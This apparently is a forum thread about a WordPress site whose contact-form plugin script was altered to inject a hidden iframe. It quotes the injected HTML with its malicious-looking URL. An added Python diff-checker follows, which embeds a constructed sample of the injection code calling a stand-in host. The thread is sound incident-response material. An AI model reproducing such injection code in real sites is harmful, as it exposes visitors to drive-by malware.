Ok, so somewhere on my site is a JavaScript file that, after a few seconds, injects an iframe to an unknown site into the page. What it injects fails miserably and the HTML is a bit messed up, but it's concerning because the iframe src has changed since the last time I checked.
Code Injected:
<divstyle="height:2px;width:111px;">
<iframe style="height:2px;width:111px;" src="http://nleskoettf.com/index.php?tp=001e4bb7b4d7333d"></iframe>
</divstyle="height:2px;width:111px;">
For an up-close and personal glance: http://caseconsultant.com is where it injects (see bottom of page). Don't worry, the URL in the iframe src is dead (downforeveryone.com/nleskoettf.com); it's not even a working website, which is the really confusing part.
Anyone know how I can track back the injected HTML to the source?
Anyone able to do that?
You may use a tool like NoScript to block domains for scripting and locate the script that injected the iframe.
Then you will see that the iframe will not be present when you block twitter.com.
There is a function inside http://caseconsultant.com/wp-content/plugins/contact-form-7/scripts.js?ver=2.3.1 (see the last line) that loads some JSON data from Twitter and creates the iframe (maybe using data from the Twitter response, which may be a reason for the changing URL).
This also may be interesting to you: Is this dangerous Javascript? (It’s the same function)
I'm not sure if this is malware; maybe there is only a bug inside the function that creates invalid HTML/URL.
But the function has nothing to do with a contact form, and also isn't a part of the original scripts.js (you'll find it here: http://downloads.wordpress.org/plugin/contact-form-7.2.3.1.zip ), so I'm afraid the site has been hacked (unless you put the function there yourself).
So what you can do:
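The comparison the answer relies on (deployed scripts.js against the copy in the official plugin zip) can be scripted. This is an added example, not part of the original answer or the plugin's code. `PRISTINE`, `DEPLOYED`, the host `feed.example` and all function names are constructed for illustration.

```python
import difflib
import re

URL_RE = re.compile(r"https?://[^\s'\"<>)]+")
MARKERS = ("iframe", "getJSON", "document.write", "eval(", "fromCharCode")

# Constructed stand-ins, not the real plugin source: official-zip copy vs. server copy.
PRISTINE = """jQuery(function($) {
  $('form.contact').ajaxForm({ dataType: 'json' });
});
function clearResponse(form) { jQuery(form).find('.response').hide(); }
"""
DEPLOYED = PRISTINE + (
    "jQuery.getJSON('http://feed.example/u.json?callback=?',function(d){"
    "jQuery('body').append('<iframe src=\"http://'+d.host+'/index.php\"></iframe>');});\n"
)

def added_text(old, new):
    """Characters of one modified line that are present only in `new`."""
    sm = difflib.SequenceMatcher(None, old, new, autojunk=False)
    return "".join(new[j1:j2] for tag, _, _, j1, j2 in sm.get_opcodes()
                   if tag in ("insert", "replace"))

def find_additions(pristine, deployed):
    """Return [(line_no, text)] for code that exists only in the deployed file."""
    a, b = pristine.splitlines(), deployed.splitlines()
    out = []
    sm = difflib.SequenceMatcher(None, a, b, autojunk=False)
    for tag, i1, i2, j1, j2 in sm.get_opcodes():
        if tag == "insert":                      # whole new lines
            out += [(j + 1, b[j]) for j in range(j1, j2)]
        elif tag == "replace":                   # code appended to an existing line
            for k, j in enumerate(range(j1, j2)):
                old = a[i1 + k] if i1 + k < i2 else ""
                out.append((j + 1, added_text(old, b[j])))
    return out

def triage(additions):
    """Attach the script markers and remote hosts each addition references."""
    report = []
    for line_no, text in additions:
        hosts = sorted({re.sub(r"^https?://", "", u).split("/")[0]
                        for u in URL_RE.findall(text)})
        report.append({"line": line_no, "hosts": hosts,
                       "markers": [m for m in MARKERS if m in text]})
    return report

if __name__ == "__main__":
    print(triage(find_additions(PRISTINE, DEPLOYED)))
```

Run against the real files, any line it reports is code that did not ship with the plugin release and should be reviewed before the file is restored from the official copy.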